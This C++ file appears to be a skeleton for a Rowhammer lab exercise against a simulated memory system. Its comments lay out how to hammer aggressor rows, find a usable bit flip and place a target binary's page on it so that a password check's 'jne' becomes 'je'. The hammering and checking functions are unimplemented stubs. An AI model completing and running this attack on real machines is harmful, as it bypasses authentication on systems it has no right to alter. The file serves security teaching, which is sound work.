#include <algorithm>
#include <array>
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <pthread.h>
#include <aio.h>
#include <sys/mman.h>
#include "PhysicalMemory.h"

// Size in bytes of the memory range that is searched for bit flips (4 GiB).
// main() divides this by ROW_SIZE to obtain the number of rows to iterate over.
#define MEMORY_SIZE (4ull*1024ull*1024ull*1024ull)

// NOTE: do not change any of the following 6 constants. This is the configuration of the simulated system you attack, and the attack may not work if you change these values.
#define CHANNELS (2)
#define RANKS_PER_CHANNEL (2)
#define BANK_GROUPS_PER_RANK (4)
#define BANKS_PER_BANK_GROUP (4)
#define ROW_SIZE_PER_BANK (8192)
// Product of the five constants above: 2 * 2 * 4 * 4 * 8192 = 524288 bytes (512 KiB) per row index
#define ROW_SIZE (CHANNELS * RANKS_PER_CHANNEL * BANK_GROUPS_PER_RANK * BANKS_PER_BANK_GROUP * ROW_SIZE_PER_BANK)

// TODO: make sure this points to the target binary
#define BINARY_NAME "./secret"
// This should be the byte offset of the "jne" instruction that you want to change into a "je".
// Only this offset modulo 4096 (the position inside its page) is compared in check_for_bit_flip().
#define BINARY_BYTE_OFFSET_TO_FLIP 0x4906
// This should be the bitmask indicating the flip direction (FE means flip the lowest bit from 1 to 0, as in FF->FE or 01->00).
// check_for_bit_flip() compares the byte read from memory for equality with this value.
#define BINARY_TARGET_FLIP_MASK 0xFE

// Handle to the physical-memory helper; assigned in main() from PhysicalMemory::getPhysicalMapping()
PhysicalMemory* physical_memory = 0;
// Running count of mismatching bytes; incremented in check_for_bit_flip() and printed with each report
size_t number_of_bitflips_in_target = 0;

// Hammers the two aggressor addresses that surround a victim row.
//
// addr1, addr2: the two aggressor addresses; main() passes one address per aggressor row.
//
// NOTE: this is currently an unimplemented stub - the body is empty, so calling it has no effect.
void double_sided_hammer(uint8_t* addr1, uint8_t* addr2)
{
  // TODO: hammer physical memory by alternatingly flushing and reloading the two addresses frequently
  // something between 10k and 10M times should suffice
  // use the functions physical_memory->maccess()
  // and physical_memory->flush() for this purpose
  // NOTE(review): the signatures of maccess() and flush() are declared in PhysicalMemory.h, not in this file - check them there
}

// Scans one row for bytes that differ from their expected value and reports whether
// one of them is the bit flip needed for the target binary.
//
// memory:         base address of the searched memory range (not read yet, see the TODOs below)
// row:            index of the victim row that is inspected; rows row-1 and row+1 are reported as aggressors
// target_offset:  byte offset of the target inside the binary; only its position within a 4096-byte page is compared
// target_bitmask: value the flipped byte must have to count as a usable flip (e.g. 0xFE)
//
// Every mismatching byte increments number_of_bitflips_in_target and is printed.
// Returns true for the first mismatch that sits at the target page offset and equals target_bitmask, false otherwise.
//
// NOTE: as long as the two TODO placeholders below are both 0x00, no mismatch is ever detected
// and the function always returns false.
bool check_for_bit_flip(uint8_t* memory, size_t row, size_t target_offset, size_t target_bitmask)
{
  // The position inside the page does not depend on the loop, so reduce it once up front
  const size_t target_page_offset = target_offset % 4096;
  // ROW_SIZE is an int expression; convert it once so the loop compares size_t with size_t
  const size_t row_size = ROW_SIZE;

  for (size_t i = 0; i < row_size; ++i)
  {
    // TODO: Check whether each byte is correct
    // you can for instance compare the value at offset i within the row 
    uint8_t byte_in_memory = 0x00; // TODO 
    uint8_t correct_byte_value = 0x00; // TODO 
    if (byte_in_memory == correct_byte_value)
    {
      continue;
    }

    ++number_of_bitflips_in_target;
    // row is a size_t, so it is printed with %zu (the original used the signed %zd)
    printf("[!] Found %zu. flip (0x%02x != 0x%02x) in row %zu (%zx) when hammering rows %zu and %zu\n", number_of_bitflips_in_target, byte_in_memory, correct_byte_value, row, i, row-1, row+1);
    // TODO: Check if offset in a 4096-byte page would match our target
    size_t bitflip_offset = 0 % 4096; // TODO 
    if (bitflip_offset != target_page_offset)
    {
      continue;
    }

    printf("[!] Bit flip is at target offset %zx\n", target_page_offset);
    // check whether bit flip does what we need by comparing it to the target flip mask (e.g. 0xFE means that 0xFF flipped to 0xFE, i.e. a bit flip that sets the lowest bit to 0)
    if (byte_in_memory == target_bitmask)
    {
      printf("[!] Bit flip matches target bitmask %zx\n", target_bitmask);
      return true;
    }
  }
  return false;
}

// Entry point: searches the mapped memory range row by row for a usable bit flip and,
// once check_for_bit_flip() reports one, places the target binary page on the flippy page.
//
// Returns 1 if no usable memory mapping or physical mapping is available, 0 otherwise
// (also when the search finishes without finding a matching flip).
//
// NOTE: the mapping, the row initialisation, the aggressor addresses and the final hammering
// are still TODOs; until the mapping TODO is filled in, the program stops at the mapping check below.
int main()
{
  printf("[!] Initializing large memory mapping ...\n");
  // TODO: MAP MEMORY TO SEARCH FOR BIT FLIPS
  // allocate a few gigabytes that fit in your RAM using mmap
  // - use PROT_READ|PROT_WRITE for prot
  // - use MAP_PRIVATE|MAP_ANONYMOUS for flags
  // - MAP_ANONYMOUS expects an fd of -1 and an offset of 0
  uint8_t* memory = nullptr;

  // Fail fast instead of handing a null or failed mapping to the code below,
  // which does pointer arithmetic on it and unmaps a page inside it
  if (memory == nullptr || memory == MAP_FAILED)
  {
    fprintf(stderr, "[!] No memory mapping available (mapping TODO not implemented or mmap failed)\n");
    return 1;
  }

  const size_t rows = MEMORY_SIZE / ROW_SIZE;
  printf("[!] Identifying %zu rows in this memory range...\n", rows);  
  physical_memory = PhysicalMemory::getPhysicalMapping(memory,MEMORY_SIZE);
  // NOTE(review): whether getPhysicalMapping() can return null is not visible here; the check is defensive because the pointer is dereferenced below
  if (physical_memory == nullptr)
  {
    fprintf(stderr, "[!] Could not obtain the physical memory mapping\n");
    return 1;
  }

  // i + 2 < rows instead of i < rows-2, so fewer than two rows cannot underflow the bound
  for (size_t i = 0; i + 2 < rows; ++i)
  {
    // TODO: PREPARE THE SEARCH FOR BIT FLIPS
    // We want to hammer 2 aggressor rows, surrounding a victim row:
    // 1. fill memory rows i and i+2 (aggressor rows) with the target data (e.g. 0x00)
    // 2. fill victim row with opposite value (e.g. 0xff)
    // You can use memset and the ROW_SIZE constant for this

    printf("[!] Hammering rows %zu/%zu/%zu (there are %zu rows in total)\n",i,i+1,i+2,rows);

    // TODO: Compute the exact address for aggressor1, make sure to have spatial locality with the target bit flip location in the page, by adding BINARY_BYTE_OFFSET_TO_FLIP % 4096 (row functions scatter actual physical locations)
    uint8_t* aggressor1 = nullptr;
    uint8_t* aggressor2 = nullptr;
    double_sided_hammer(aggressor1,aggressor2);

    if (!check_for_bit_flip(memory,i+1,BINARY_BYTE_OFFSET_TO_FLIP,BINARY_TARGET_FLIP_MASK))
    {
      continue;
    }

    printf("[!] evicting page cache to make sure the target binary page is not in memory\n");
    physical_memory->evictFromPageCache(BINARY_NAME,BINARY_BYTE_OFFSET_TO_FLIP);
    printf("[!] munmap the flippy page. the next page will be allocated exactly into this gap, placed on the flippy page\n");
    physical_memory->munmap(memory+(i+1)*ROW_SIZE,4096);
    // NOTE(review): this message used to be a copy of the loadFile message below; the new wording is derived from the call name - confirm it matches what checkIfRunning() does
    printf("[!] checking whether the target binary is running\n");
    physical_memory->checkIfRunning(BINARY_NAME);
    printf("[!] load the target page into memory, placing it on the flippy page\n");
    physical_memory->loadFile(BINARY_NAME,BINARY_BYTE_OFFSET_TO_FLIP);


    // TODO: HAMMER AGAIN, but this time we want to make sure that the bit really flips so hammer like 50 times - you might have to tune this value until the exploit runs reliably...
    // - you might have to use memset again to initialize the aggressor rows
    // - you want to use double_sided_hammer() again to hammer the target page now
    printf("[!] Hammering rows %zu/%zu/%zu many times to induce bit flip in victim page\n",i,i+1,i+2);

    
    printf("[!] Hopefully the password check is inverted now. Just try it out with any wrong password.\n");
    return 0;
  }
  return 0;
}
